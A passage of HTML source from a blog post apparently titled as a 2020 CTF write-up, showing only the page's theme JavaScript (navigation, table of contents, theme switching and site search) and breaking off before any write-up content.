<!DOCTYPE html>
<html lang="en" dir="ltr">

<head prefix="og: http://ogp.me/ns#">
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <title>2020CTF WP – ruokeqx&#39;s blog</title>
    


  
  <script defer src="/js/fuse.min.8dfbf8696f107ab8b55732efbb04c5c51576692a4a2cce6effef9f6e92d341a7.js"></script>



<script src="/js/enquire.min.aa37bdcb743826eecdae5c5d177fc7d6552340f1b4378ffaa9c82b2c6111400b.js"></script>

<script defer src="/js/lazysizes.min.498676c34eb225e85357ab0ce19c3c1244f3bd0bf595e5684d1b9d50ea4fbc42.js"></script>

<script defer src="/js/helper/getParents.min.b75dda22e2d1c0e1e0574c7764bb95bec70c0fb0d4d5440339ba68c685d5a661.js"></script>

<script defer src="/js/helper/fadeinout.min.b1a8c6db3f3cc261756044570d21596f0f083625d41433dc9ac02aba5e53777b.js"></script>

<script defer src="/js/helper/closest.min.js"></script>
  
<script>
  "use strict";

  
  
  if (window.NodeList && !NodeList.prototype.forEach) {
    NodeList.prototype.forEach = Array.prototype.forEach;
  }

  
  if (!String.prototype.includes) {
    String.prototype.includes = function (search, start) {
      'use strict';

      if (search instanceof RegExp) {
        throw TypeError('first argument must not be a RegExp');
      }
      if (start === undefined) { start = 0; }
      return this.indexOf(search, start) !== -1;
    };
  }

  
  Document.prototype.append = Element.prototype.append = function append() {
    this.appendChild(_mutation(arguments));
  };
  function _mutation(nodes) {
    if (!nodes.length) {
      throw new Error('DOM Exception 8');
    } else if (nodes.length === 1) {
      return typeof nodes[0] === 'string' ? document.createTextNode(nodes[0]) : nodes[0];
    } else {
      var
      fragment = document.createDocumentFragment(),
      length = nodes.length,
      index = -1,
      node;

      while (++index < length) {
        node = nodes[index];

        fragment.appendChild(typeof node === 'string' ? document.createTextNode(node) : node);
      }

      return fragment;
    }
  }

  
  if (!String.prototype.startsWith) {
    String.prototype.startsWith = function (searchString, position) {
      position = position || 0;
      return this.indexOf(searchString, position) === position;
    };
  }
  


  document.addEventListener('DOMContentLoaded', function () {
    
    var navCollapseBtn = document.querySelector('.navbar__burger');
    navCollapseBtn ? navCollapseBtn.addEventListener('click', function (e) {
      var navCollapse = document.querySelector('.navbarm__collapse');

      if (navCollapse) {
        var dataOpen = navCollapse.getAttribute('data-open');

        if (dataOpen === 'true') {
          navCollapse.setAttribute('data-open', 'false');
          navCollapse.style.maxHeight = 0;
          navCollapseBtn.classList.remove('is-active');
        } else {
          navCollapse.setAttribute('data-open', 'true');
          navCollapse.style.maxHeight = navCollapse.scrollHeight + "px";
          navCollapseBtn.classList.add('is-active');
        }
      }
    }) : null;
    


    
    var tables = document.querySelectorAll('.single__contents > table');
    for (let i = 0; i < tables.length; i++) {
      var table = tables[i];
      var wrapper = document.createElement('div');
      wrapper.className = 'table-wrapper';
      table.parentElement.replaceChild(wrapper, table);
      wrapper.appendChild(table);
    }
    


    
    var footNoteRefs = document.querySelectorAll('.footnote-ref');
    var footNoteBackRefs = document.querySelectorAll('.footnote-backref');

    footNoteRefs ? 
    footNoteRefs.forEach(function(elem, idx) {
      elem.onmouseenter = function () {
        if (navbar.classList.contains('scrolling')) {
          navbar.classList.remove('scrolling');
        }
      }

      elem.onmouseleave = function () {
        if (!navbar.classList.contains('scrolling')) {
          setTimeout(function () {
            navbar.classList.add('scrolling');
          }, 100);
        }
      }

      elem.onclick = function () {
        if (!navbar.classList.contains('scrolling')) {
          navbar.classList.remove('navbar--show');
          navbar.classList.remove('navbar--hide');
          navbar.classList.add('navbar--hide');
        }
      }
    }) : null;

    footNoteBackRefs ? 
    footNoteBackRefs.forEach(function(elem, idx) {
      elem.onmouseenter = function () {
        if (navbar.classList.contains('scrolling')) {
          navbar.classList.remove('scrolling');
        }
      }

      elem.onmouseleave = function () {
        if (!navbar.classList.contains('scrolling')) {
          setTimeout(function() {
            navbar.classList.add('scrolling');
          }, 100);
        }
      }

      elem.onclick = function () {
        if (!navbar.classList.contains('scrolling')) {
          navbar.classList.remove('navbar--show');
          navbar.classList.remove('navbar--hide');
          navbar.classList.add('navbar--hide');
        }
      }
    }) : null;
    


    
    var summaryContainer = document.querySelector('.summary__container');
    var searchResult = document.querySelector('.search-result');
    var searchResultCloseBtn = document.querySelector('.search-result__close');
    searchResultCloseBtn ? searchResultCloseBtn.addEventListener('click', function (e) {
      searchResult.setAttribute('data-display', 'none');
      summaryContainer.setAttribute('data-display', 'block');
    }) : null;
    


    
    document.querySelectorAll('.tab') ? 
    document.querySelectorAll('.tab').forEach(function(elem, idx) {
      var containerId = elem.getAttribute('id');
      var containerElem = elem;
      var tabLinks = elem.querySelectorAll('.tab__link');
      var tabContents = elem.querySelectorAll('.tab__content');
      var ids = [];

      tabLinks && tabLinks.length > 0 ?
      tabLinks.forEach(function(link, index, self) {
        link.onclick = function(e) {
          for (var i = 0; i < self.length; i++) {
            if (index === parseInt(i, 10)) {
              if (!self[i].classList.contains('active')) {
                self[i].classList.add('active');
                tabContents[i].style.display = 'block';
              }
            } else {
              self[i].classList.remove('active');
              tabContents[i].style.display = 'none';
            }
          }
        }
      }) : null;
    }) : null;
    


    
    document.querySelectorAll('.codetab') ? 
    document.querySelectorAll('.codetab').forEach(function(elem, idx) {
      var containerId = elem.getAttribute('id');
      var containerElem = elem;
      var codetabLinks = elem.querySelectorAll('.codetab__link');
      var codetabContents = elem.querySelectorAll('.codetab__content');
      var ids = [];

      codetabLinks && codetabLinks.length > 0 ?
      codetabLinks.forEach(function(link, index, self) {
        link.onclick = function(e) {
          for (var i = 0; i < self.length; i++) {
            if (index === parseInt(i, 10)) {
              if (!self[i].classList.contains('active')) {
                self[i].classList.add('active');
                codetabContents[i].style.display = 'block';
              }
            } else {
              self[i].classList.remove('active');
              codetabContents[i].style.display = 'none';
            }
          }
        }
      }) : null;
    }) : null;
    


    
    var gttBtn = document.getElementById("gtt");
    gttBtn.style.display = "none";
    gttBtn.addEventListener('click', function () {
      if (window.document.documentMode) {
        document.documentElement.scrollTop = 0;
      } else {
        scrollToTop(250);
      }
    });

    function scrollToTop(scrollDuration) {
      var scrollStep = -window.scrollY / (scrollDuration / 15);
      var scrollInterval = setInterval(function () {
        if (window.scrollY != 0) {
          window.scrollBy(0, scrollStep);
        }
        else clearInterval(scrollInterval);
      }, 15);
    }

    var scrollFunction = function () {
      if (document.body.scrollTop > 250 || document.documentElement.scrollTop > 250) {
        gttBtn.style.display = "block";
      } else {
        gttBtn.style.display = "none";
      }
    }
    


    
    var expandBtn = document.querySelectorAll('.expand__button');

    for (let i = 0; i < expandBtn.length; i++) {
      expandBtn[i].addEventListener("click", function () {
        var content = this.nextElementSibling;
        if (content.style.maxHeight) {
          content.style.maxHeight = null;
          this.querySelector('svg').classList.add('expand-icon__right');
          this.querySelector('svg').classList.remove('expand-icon__down');
        } else {
          content.style.maxHeight = content.scrollHeight + "px";
          this.querySelector('svg').classList.remove('expand-icon__right');
          this.querySelector('svg').classList.add('expand-icon__down');
        }
      });
    }
    


    
    var lastScrollTop = window.pageYOffset || document.documentElement.scrollTop;
    var tocElem = document.querySelector('.toc');
    var tableOfContentsElem = tocElem ? tocElem.querySelector('#TableOfContents') : null;
    var toggleTocElem = document.getElementById('toggle-toc');
    var singleContentsElem = document.querySelector('.single__contents');
    var navbar = document.querySelector('.navbar');
    var tocFlexbox = document.querySelector('.toc__flexbox');
    var tocFlexboxOuter = document.querySelector('.toc__flexbox--outer');
    var expandContents = document.querySelectorAll('.expand__content');
    var boxContents = document.querySelectorAll('.box');
    var notAllowedTitleIds = null;

    
    var tocFolding = JSON.parse("true");
    
    var tocLevels = JSON.parse("[\"h2\",\"h3\",\"h4\",\"h5\"]");
    
    if (tocLevels) {
      tocLevels = tocLevels.toString();
    } else {
      tocLevels = "h1, h2, h3, h4, h5, h6";
    }

    
    singleContentsElem && singleContentsElem.querySelectorAll(".tab") ?
    singleContentsElem.querySelectorAll(".tab").forEach(function (elem) {
      elem.querySelectorAll(tocLevels).forEach(function (element) {
        notAllowedTitleIds = Array.isArray(notAllowedTitleIds) ?
          notAllowedTitleIds.concat(element.getAttribute('id')) :
          [element.getAttribute('id')];
      });
    }) : null;

    
    expandContents ? expandContents.forEach(function(elem) {
      elem.querySelectorAll(tocLevels).forEach(function (element) {
        notAllowedTitleIds = Array.isArray(notAllowedTitleIds) ?
          notAllowedTitleIds.concat(element.getAttribute('id')) :
          [element.getAttribute('id')];
      });
    }) : null;

    
    boxContents ? boxContents.forEach(function(elem) {
      elem.querySelectorAll(tocLevels).forEach(function (element) {
        notAllowedTitleIds = Array.isArray(notAllowedTitleIds) ?
          notAllowedTitleIds.concat(element.getAttribute('id')) :
          [element.getAttribute('id')];
      });
    }) : null;

    
    window.onscroll = function () {
      scrollFunction();
      
      var st = window.pageYOffset || document.documentElement.scrollTop;
      if (st > lastScrollTop) { 
        if (st < 250) {
          gttBtn.style.display = "none";
        } else {
          gttBtn.style.display = "block";
        }

        if (st < 45) {
          return null;
        }

        if (navbar.classList.contains('scrolling')) {
          if (!navbar.classList.contains('navbar--hide')) {
            navbar.classList.add('navbar--hide');
          } else if (navbar.classList.contains('navbar--show')) {
            navbar.classList.remove('navbar--show');
          }
        }

        if (singleContentsElem) {
          if (singleContentsElem.querySelectorAll(tocLevels).length > 0) {
            singleContentsElem.querySelectorAll(tocLevels).forEach(function (elem) {
              if (toggleTocElem && !toggleTocElem.checked) {
                return null;
              }

              if (notAllowedTitleIds && notAllowedTitleIds.includes(elem.getAttribute('id'))) {
                return null;
              }
              
              if (document.documentElement.scrollTop >= elem.offsetTop) {
                if (tableOfContentsElem) {
                  var id = elem.getAttribute('id');
                  tocElem.querySelectorAll('a').forEach(function (elem) {
                    elem.classList.remove('active');
                  });
                  tocElem.querySelector('a[href="#' + id + '"]') ?
                    tocElem.querySelector('a[href="#' + id + '"]').classList.add('active') : null;

                  if (false === tocFolding) {
                    
                  } else {
                    tableOfContentsElem.querySelectorAll('ul') ?
                      tableOfContentsElem.querySelectorAll('ul').forEach(function (rootUl) {
                        rootUl.querySelectorAll('li').forEach(function (liElem) {
                          liElem.querySelectorAll('ul').forEach(function (ulElem) {
                            ulElem.style.display = 'none';
                          });
                        });
                      }) : null;
                  }

                  var curElem = tableOfContentsElem.querySelector("[href='#" + id + "']");
                  if (curElem && curElem.nextElementSibling) {
                    curElem.nextElementSibling.style.display = 'block';
                  }
                  getParents(curElem, 'ul') ?
                    getParents(curElem, 'ul').forEach(function (elem) {
                      elem.style.display = 'block';
                    }) : null;
                }
              }
            });
          } else {
            if (tocFlexbox) {
              tocFlexbox.setAttribute('data-position', '');
              if (!tocFlexbox.classList.contains('hide')) {
                tocFlexbox.classList.add('hide');
              }
            }
            if (tocFlexboxOuter) {
              tocFlexboxOuter.setAttribute('data-position', '');
              if (!tocFlexboxOuter.classList.contains('hide')) {
                tocFlexboxOuter.classList.add('hide');
              }
            }
          }
        }
      } else { 
        if (st < 250) {
          gttBtn.style.display = "none";
        }

        if (navbar.classList.contains('scrolling')) {
          if (navbar.classList.contains('navbar--hide')) {
            navbar.classList.remove('navbar--hide');
          } else if (!navbar.classList.contains('navbar--show')) {
            navbar.classList.add('navbar--show');
          }
        }

        if (singleContentsElem) {
          if (singleContentsElem.querySelectorAll(tocLevels).length > 0) {
            singleContentsElem.querySelectorAll(tocLevels).forEach(function (elem) {
              if (toggleTocElem && !toggleTocElem.checked) {
                return null;
              }
              
              if (notAllowedTitleIds && notAllowedTitleIds.includes(elem.getAttribute('id'))) {
                return null;
              }

              if (document.documentElement.scrollTop >= elem.offsetTop) {
                if (tableOfContentsElem) {
                  var id = elem.getAttribute('id');
                  tocElem.querySelectorAll('a').forEach(function (elem) {
                    elem.classList.remove('active');
                  });
                  tocElem.querySelector('a[href="#' + id + '"]') ?
                    tocElem.querySelector('a[href="#' + id + '"]').classList.add('active') : null;

                  if (false === tocFolding) {
                    
                  } else {
                    tableOfContentsElem.querySelectorAll('ul') ?
                      tableOfContentsElem.querySelectorAll('ul').forEach(function (rootUl) {
                        rootUl.querySelectorAll('li').forEach(function (liElem) {
                          liElem.querySelectorAll('ul').forEach(function (ulElem) {
                            ulElem.style.display = 'none';
                          });
                        });
                      }) : null;
                  }

                  var curElem = tableOfContentsElem.querySelector("[href='#" + id + "']");
                  if (curElem && curElem.nextElementSibling) {
                    curElem.nextElementSibling.style.display = 'block';
                  }
                  getParents(curElem, 'ul') ?
                    getParents(curElem, 'ul').forEach(function (elem) {
                      elem.style.display = 'block';
                    }) : null;
                }
              }
            });
          } else {
            if (tocFlexbox && !tocFlexbox.classList.contains('hide')) {
              tocFlexbox.classList.add('hide');
            }
            if (tocFlexboxOuter && !tocFlexboxOuter.classList.contains('hide')) {
              tocFlexboxOuter.classList.add('hide');
            }
          }
          
        }

        if (tableOfContentsElem && document.documentElement.scrollTop < 250) {
          if (false === tocFolding) {

          } else {
            tableOfContentsElem.querySelector('ul') ?
              tableOfContentsElem.querySelector('ul').querySelectorAll('li').forEach(function (liElem) {
                liElem.querySelectorAll('ul').forEach(function (ulElem) {
                  ulElem.style.display = 'none';
                });
              }) : null;
          }
        }
      }
      lastScrollTop = st <= 0 ? 0 : st;
    };
  


  
    var localTheme = localStorage.getItem('theme');
    var rootEleme = document.getElementById('root');
    var selectThemeElem = document.querySelectorAll('.select-theme');
    var selectThemeItemElem = document.querySelectorAll('.select-theme__item');
    
    
    var skinDarkCode = JSON.parse("\"dark\"");
    
    var skinLightCode = JSON.parse("\"light\"");
    
    var skinHackerCode = JSON.parse("\"hacker\"");
    
    var skinSolarizedCode = JSON.parse("\"solarized\"");
    
    var skinKimbieCode = JSON.parse("\"kimbie\"");

    var setMetaColor = function(themeColor) {
      var metaMsapplicationTileColor = document.getElementsByName('msapplication-TileColor')[0];
      var metaThemeColor = document.getElementsByName('theme-color')[0];
      var metaMsapplicationNavbuttonColor = document.getElementsByName('msapplication-navbutton-color')[0];
      var metaAppleMobileWebAappStatusBarStyle = document.getElementsByName('apple-mobile-web-app-status-bar-style')[0];

      if (themeColor.includes('dark')) {
        metaMsapplicationTileColor.setAttribute('content', '#fcfcfa');
        metaThemeColor.setAttribute('content', '#403E41');
        metaMsapplicationNavbuttonColor.setAttribute('content', '#403E41');
        metaAppleMobileWebAappStatusBarStyle.setAttribute('content', '#403E41');
      } else if (themeColor.includes('light')) {
        metaMsapplicationTileColor.setAttribute('content', '#555');
        metaThemeColor.setAttribute('content', '#eee');
        metaMsapplicationNavbuttonColor.setAttribute('content', '#eee');
        metaAppleMobileWebAappStatusBarStyle.setAttribute('content', '#eee');
      } else if (themeColor.includes('hacker')) {
        metaMsapplicationTileColor.setAttribute('content', '#e3cd26');
        metaThemeColor.setAttribute('content', '#252526');
        metaMsapplicationNavbuttonColor.setAttribute('content', '#252526');
        metaAppleMobileWebAappStatusBarStyle.setAttribute('content', '#252526');
      } else if (themeColor.includes('solarized')) {
        metaMsapplicationTileColor.setAttribute('content', '#d3af86');
        metaThemeColor.setAttribute('content', '#51412c');
        metaMsapplicationNavbuttonColor.setAttribute('content', '#51412c');
        metaAppleMobileWebAappStatusBarStyle.setAttribute('content', '#51412c');
      } else if (themeColor.includes('kimbie')) {
        metaMsapplicationTileColor.setAttribute('content', '#586e75');
        metaThemeColor.setAttribute('content', '#eee8d5');
        metaMsapplicationNavbuttonColor.setAttribute('content', '#eee8d5');
        metaAppleMobileWebAappStatusBarStyle.setAttribute('content', '#eee8d5');
      }
    }

    var parseSkinCode = function(themeText) {
      if (themeText === skinDarkCode) {
        return 'dark';
      } else if (themeText === skinLightCode) {
        return 'light';
      } else if (themeText === skinHackerCode) {
        return 'hacker';
      } else if (themeText === skinSolarizedCode) {
        return 'solarized';
      } else if (themeText === skinKimbieCode) {
        return 'kimbie';
      }
    }
    
    if (localTheme) {
      selectThemeItemElem ? 
      selectThemeItemElem.forEach(function (elem) {
        if (elem.text.trim() === localTheme) {
          elem.classList.add('is-active');
        } else {
          elem.classList.remove('is-active');
        }
      }) : null;

      setMetaColor(localTheme);
    } else {
      setMetaColor(rootEleme.className);
    }

    selectThemeItemElem ? 
    selectThemeItemElem.forEach(function (v, i) {
      v.addEventListener('click', function (e) {
        var selectedThemeVariant = parseSkinCode(e.target.text.trim());
        localStorage.setItem('theme', selectedThemeVariant);
        setMetaColor(selectedThemeVariant);

        rootEleme.removeAttribute('class');
        rootEleme.classList.add('theme__' + selectedThemeVariant);
        selectThemeElem.forEach(function(rootElem) {
          rootElem.querySelectorAll('a').forEach(function (elem) {
            if (elem.classList) {
              if (elem.text.trim() === selectedThemeVariant) {
                if (!elem.classList.contains('is-active')) {
                  elem.classList.add('is-active');
                }
              } else {
                if (elem.classList.contains('is-active')) {
                  elem.classList.remove('is-active');
                }
              }
            }
          });
        });

        if (window.mermaid) {
          if (selectedThemeVariant === "dark" || selectedThemeVariant === "hacker") {
            mermaid.initialize({ theme: 'dark' });
            location.reload();
          } else {
            mermaid.initialize({ theme: 'default' });
            location.reload();
          }
        }

        var utterances = document.getElementById('utterances');
        if (utterances) {
          utterances.querySelector('iframe').contentWindow.postMessage({
            type: 'set-theme',
            theme: selectedThemeVariant === "dark" || selectedThemeVariant === "hacker" ? 'photon-dark' : selectedThemeVariant === 'kimbie' ? 'github-dark-orange' : 'github-light',
          }, 'https://utteranc.es');
        }

        var twitterCards = document.querySelectorAll('.twitter-timeline');
        if (twitterCards) {
          window.postMessage({
            type: 'set-twitter-theme',
            theme: selectedThemeVariant === 'light' || selectedThemeVariant === 'solarized' ? 'light' : 'dark',
          });
        }
      });
    }) : null;
  


  
    
    var baseurl = JSON.parse("\"https://ruokeqx.gitee.io\"");
    
    var permalink = JSON.parse("\"https://ruokeqx.gitee.io/posts/2020ctfwp/\"");
    
    var langprefix = JSON.parse("\"\"");
    var searchResults = null;
    var searchMenu = null;
    var searchText = null;
    
    
    var enableSearch = JSON.parse("true");
    
    var searchDistance = JSON.parse("100");
    
    var searchThreshold = JSON.parse("0.4");
    
    var searchContent = JSON.parse("true");
    
    var enableSearchHighlight = JSON.parse("true");
    
    var searchResultPosition = JSON.parse("\"main\"");
    
    var sectionType = JSON.parse("\"posts\"");
    
    var kind = JSON.parse("\"page\"");
    
    var fuse = null;

    if (enableSearch) {
      (function initFuse() {
        var xhr = new XMLHttpRequest();
        if (sectionType === "publication" && kind !== "page") {
          xhr.open('GET', permalink + "index.json");
        } else {
          xhr.open('GET', baseurl + langprefix + "/index.json");
        }
        
        xhr.setRequestHeader('Content-Type', 'application/json; charset=utf-8');
        xhr.onload = function () {
          if (xhr.status === 200) {
            fuse = new Fuse(JSON.parse(xhr.response.toString('utf-8')), {
              keys: sectionType.includes('publication') ? ['title', 'abstract'] : 
                searchContent ? ['title', 'description', 'content'] : ['title', 'description'],
              includeMatches: enableSearchHighlight,
              shouldSort: true, 
              threshold: searchThreshold ? searchThreshold : 0.4, 
              location: 0, 
              distance: searchDistance ? searchDistance : 100, 
              maxPatternLength: 32,
              minMatchCharLength: 1,
              isCaseSensitive: false, 
              findAllMatches: false, 
              useExtendedSearch: false, 
            });
            window.fuse = fuse;
          }
          else {
            console.error('[' + xhr.status + ']Error:', xhr.statusText);
          }
        };
        xhr.send();
      })();
    }

    function makeLi(ulElem, obj) {
      var li = document.createElement('li');
      li.className = 'search-result__item';
      
      var a = document.createElement('a');
      a.innerHTML = obj.item.title;
      a.setAttribute('class', 'search-result__item--title');
      a.setAttribute('href', obj.item.uri);

      var descDiv = document.createElement('div');
      descDiv.setAttribute('class', 'search-result__item--desc');
      if (obj.item.description) {
        descDiv.innerHTML = obj.item.description;
      } else if (obj.item.content) {
        descDiv.innerHTML = obj.item.content.substring(0, 225);
      }
      
      li.appendChild(a);
      li.appendChild(descDiv);
      ulElem.appendChild(li);
    }

    function makeHighlightLi(ulElem, obj) {
      var li = document.createElement('li');
      li.className = 'search-result__item';
      var descDiv = null;

      var a = document.createElement('a');
      a.innerHTML = obj.item.title;
      a.setAttribute('class', 'search-result__item--title');
      a.setAttribute('href', obj.item.uri);

      if (obj.matches && obj.matches.length) {
        for (var i = 0; i < obj.matches.length; i++) {
          if ('title' === obj.matches[i].key) {
            a = document.createElement('a');
            a.innerHTML = generateHighlightedText(obj.matches[i].value, obj.matches[i].indices);
            a.setAttribute('class', 'search-result__item--title');
            a.setAttribute('href', obj.item.uri);
          }
          
          if ('description' === obj.matches[i].key) {
            descDiv = document.createElement('div');
            descDiv.setAttribute('class', 'search-result__item--desc');
            descDiv.innerHTML = generateHighlightedText(obj.item.description, obj.matches[i].indices);
          } else if ('content' === obj.matches[i].key) {
            if (!descDiv) {
              descDiv = document.createElement('div');
              descDiv.setAttribute('class', 'search-result__item--desc');
              descDiv.innerHTML = generateHighlightedText(obj.item.content.substring(0, 150), obj.matches[i].indices);
            }
          } else {
            if (obj.item.description) {
              descDiv = document.createElement('div');
              descDiv.setAttribute('class', 'search-result__item--desc');
              descDiv.innerHTML = obj.item.description;
            } else {
              descDiv = document.createElement('div');
              descDiv.setAttribute('class', 'search-result__item--desc');
              descDiv.innerHTML = obj.item.content.substring(0, 150);
            }
          }
        }

        li.appendChild(a);
        if (descDiv) {
          li.appendChild(descDiv);
        }
        if (li) {
          ulElem.appendChild(li);
        }
      }
    }

    function renderSearchResultsSide(searchText, results) {
      searchResults = document.getElementById('search-results');
      searchMenu = document.getElementById('search-menu');
      searchResults.setAttribute('class', 'dropdown is-active');
      
      var ul = document.createElement('ul');
      ul.setAttribute('class', 'dropdown-content search-content');

      if (results.length) {
        results.forEach(function (result) {
          var li = document.createElement('li');
          var a = document.createElement('a');
          a.setAttribute('href', result.uri);
          a.setAttribute('class', 'dropdown-item');
          a.appendChild(li);

          var titleDiv = document.createElement('div');
          titleDiv.innerHTML = result.title;
          titleDiv.setAttribute('class', 'menu-item__title');

          var descDiv = document.createElement('div');
          descDiv.setAttribute('class', 'menu-item__desc');
          if (result.description) {
            descDiv.innerHTML = result.description;
          } else if (result.content) {
            descDiv.innerHTML = result.content.substring(0, 150);
          }

          li.appendChild(titleDiv);
          li.appendChild(descDiv);
          ul.appendChild(a);
        });
      } else {
        var li = document.createElement('li');
        li.setAttribute('class', 'dropdown-item');
        li.innerText = 'No results found';
        ul.appendChild(li);
      }

      while (searchMenu.hasChildNodes()) {
        searchMenu.removeChild(
          searchMenu.lastChild
        );
      }
      
      searchMenu.appendChild(ul);
    }

    function renderSearchHighlightResultsSide(searchText, results) {
      searchResults = document.getElementById('search-results');
      searchMenu = document.getElementById('search-menu');
      searchResults.setAttribute('class', 'dropdown is-active');

      var ul = document.createElement('ul');
      ul.setAttribute('class', 'dropdown-content search-content');

      if (results.length) {
        results.forEach(function (result) {
          var li = document.createElement('li');
          var a = document.createElement('a');
          var descDiv = null;

          a.setAttribute('href', result.item.uri);
          a.setAttribute('class', 'dropdown-item');
          a.appendChild(li);

          var titleDiv = document.createElement('div');
          titleDiv.innerHTML = result.item.title;
          titleDiv.setAttribute('class', 'menu-item__title');
          
          if (result.matches && result.matches.length) {
            for (var i = 0; i < result.matches.length; i++) {
              if ('title' === result.matches[i].key) {
                titleDiv.innerHTML = generateHighlightedText(result.matches[i].value, result.matches[i].indices);
              }

              if ('description' === result.matches[i].key) {
                descDiv = document.createElement('div');
                descDiv.setAttribute('class', 'menu-item__desc');
                descDiv.innerHTML = generateHighlightedText(result.item.description, result.matches[i].indices);
              } else if ('content' === result.matches[i].key) {
                if (!descDiv) {
                  descDiv = document.createElement('div');
                  descDiv.setAttribute('class', 'menu-item__desc');
                  descDiv.innerHTML = generateHighlightedText(result.item.content.substring(0, 150), result.matches[i].indices);
                }
              } else {
                if (result.item.description) {
                  descDiv = document.createElement('div');
                  descDiv.setAttribute('class', 'menu-item__desc');
                  descDiv.innerHTML = result.item.description;
                } else {
                  descDiv = document.createElement('div');
                  descDiv.setAttribute('class', 'menu-item__desc');
                  descDiv.innerHTML = result.item.content.substring(0, 150);
                }
              }
            }
            
            li.appendChild(titleDiv);
            if (descDiv) {
              li.appendChild(descDiv);
            }
            ul.appendChild(a);
          }
        });
      } else {
        var li = document.createElement('li');
        li.setAttribute('class', 'dropdown-item');
        li.innerText = 'No results found';
        ul.appendChild(li);
      }

      while (searchMenu.hasChildNodes()) {
        searchMenu.removeChild(
          searchMenu.lastChild
        );
      }
      searchMenu.appendChild(ul);
    }

    function renderSearchResultsMobile(searchText, results) {
      searchResults = document.getElementById('search-mobile-results');

      var content = document.createElement('div');
      content.setAttribute('class', 'mobile-search__content');

      if (results.length > 0) {
        results.forEach(function (result) {
          var item = document.createElement('a');
          item.setAttribute('href', result.uri);
          item.innerHTML = '<div class="mobile-search__item"><div class="mobile-search__item--title">📄 ' + result.title + '</div><div class="mobile-search__item--desc">' + (result.description ? result.description : result.content) + '</div></div>';
          content.appendChild(item);
        });
      } else {
        var item = document.createElement('span');
        content.appendChild(item);
      }

      let wrap = document.getElementById('search-mobile-results');
      while (wrap.firstChild) {
        wrap.removeChild(wrap.firstChild)
      }
      searchResults.appendChild(content);      
    }

    function renderSearchHighlightResultsMobile(searchText, results) {
      searchResults = document.getElementById('search-mobile-results');

      var ul = document.createElement('div');
      ul.setAttribute('class', 'mobile-search__content');

      if (results.length) {
        results.forEach(function (result) {
          var li = document.createElement('li');
          var a = document.createElement('a');
          var descDiv = null;

          a.setAttribute('href', result.item.uri);
          a.appendChild(li);
          li.setAttribute('class', 'mobile-search__item');

          var titleDiv = document.createElement('div');
          titleDiv.innerHTML = result.item.title;
          titleDiv.setAttribute('class', 'mobile-search__item--title');
          
          if (result.matches && result.matches.length) {
            for (var i = 0; i < result.matches.length; i++) {
              if ('title' === result.matches[i].key) {
                titleDiv.innerHTML = generateHighlightedText(result.matches[i].value, result.matches[i].indices);
              }

              if ('description' === result.matches[i].key) {
                descDiv = document.createElement('div');
                descDiv.setAttribute('class', 'mobile-search__item--desc');
                descDiv.innerHTML = generateHighlightedText(result.item.description, result.matches[i].indices);
              } else if ('content' === result.matches[i].key) {
                if (!descDiv) {
                  descDiv = document.createElement('div');
                  descDiv.setAttribute('class', 'mobile-search__item--desc');
                  descDiv.innerHTML = generateHighlightedText(result.item.content.substring(0, 150), result.matches[i].indices);
                }
              } else {
                if (result.item.description) {
                  descDiv = document.createElement('div');
                  descDiv.setAttribute('class', 'mobile-search__item--desc');
                  descDiv.innerHTML = result.item.description;
                } else {
                  descDiv = document.createElement('div');
                  descDiv.setAttribute('class', 'mobile-search__item--desc');
                  descDiv.innerHTML = result.item.content.substring(0, 150);
                }
              }
            }
            
            li.appendChild(titleDiv);
            if (descDiv) {
              li.appendChild(descDiv);
            }
            ul.appendChild(a);
          }
        });
      } else {
        var item = document.createElement('span');
        ul.appendChild(item);
      }

      let wrap = document.getElementById('search-mobile-results');
      while (wrap.firstChild) {
        wrap.removeChild(wrap.firstChild)
      }
      searchResults.appendChild(ul);
    }

    function generateHighlightedText(text, regions) {
      if (!regions) {
        return text;
      }

      var content = '', nextUnhighlightedRegionStartingIndex = 0;

      regions.forEach(function(region) {
        if (region[0] === region[1]) {
          return null;
        }
        
        content += '' +
          text.substring(nextUnhighlightedRegionStartingIndex, region[0]) +
          '<span class="search__highlight">' +
            text.substring(region[0], region[1] + 1) +
          '</span>' +
        '';
        nextUnhighlightedRegionStartingIndex = region[1] + 1;
      });

      content += text.substring(nextUnhighlightedRegionStartingIndex);

      return content;
    };

    var searchElem = document.getElementById('search');
    var searchMobile = document.getElementById('search-mobile');
    var searchResultsContainer = document.getElementById('search-results');

    searchElem ?
    searchElem.addEventListener('input', function(e) {
      if (!e.target.value | window.innerWidth < 770) {
        searchResultsContainer ? searchResultsContainer.setAttribute('class', 'dropdown') : null;
        searchResult ? searchResult.setAttribute('data-display', 'none') : null;
        summaryContainer ? summaryContainer.setAttribute('data-display', 'block') : null;
        return null;
      }

      searchText = e.target.value;
      var results = fuse.search(e.target.value);
      
      if (searchResultPosition === "main") {
        if (enableSearchHighlight) {
          renderSearchHighlightResultsMain(searchText, results);
        } else {
          renderSearchResultsMain(searchText, results);
        }
      } else {
        if (enableSearchHighlight) {
          renderSearchHighlightResultsSide(searchText, results);
        } else {
          renderSearchResultsSide(searchText, results);
        }
        
        var dropdownItems = searchResultsContainer.querySelectorAll('.dropdown-item');
        dropdownItems ? dropdownItems.forEach(function(item) {
          item.addEventListener('mousedown', function(e) {
            e.target.click();
          });
        }) : null;
      }
    }) : null;

    searchElem ? 
    searchElem.addEventListener('blur', function() {
      if (window.innerWidth < 770) {
        return null;
      }
      searchResultsContainer ? searchResultsContainer.setAttribute('class', 'dropdown') : null;
    }) : null;

    searchElem ? 
    searchElem.addEventListener('click', function(e) {
      if (window.innerWidth < 770) {
        return null;
      }
      if (!e.target.value) {
        searchResultsContainer ? searchResultsContainer.setAttribute('class', 'dropdown') : null;
        return null;
      }

      searchText = e.target.value;
      var results = fuse.search(e.target.value);

      if (searchResultPosition === "main") {
        if (enableSearchHighlight) {
          renderSearchHighlightResultsMain(searchText, results);
        } else {
          renderSearchResultsMain(searchText, results);
        }
      } else{
        if (enableSearchHighlight) {
          renderSearchHighlightResultsSide(searchText, results);
        } else {
          renderSearchResultsSide(searchText, results);
        }

        var dropdownItems = searchResultsContainer.querySelectorAll('.dropdown-item');
        dropdownItems ? dropdownItems.forEach(function (item) {
          item.addEventListener('mousedown', function (e) {
            e.target.click();
          });
        }) : null;
      }
    }) : null;

    var searchMenuElem = document.getElementById("search-menu");
    var activeItem = document.querySelector('#search-menu .dropdown-item.is-active');
    var activeIndex = null;
    var items = null;
    var searchContainerMaxHeight = 350;

    searchElem ? 
    searchElem.addEventListener('keydown', function(e) {
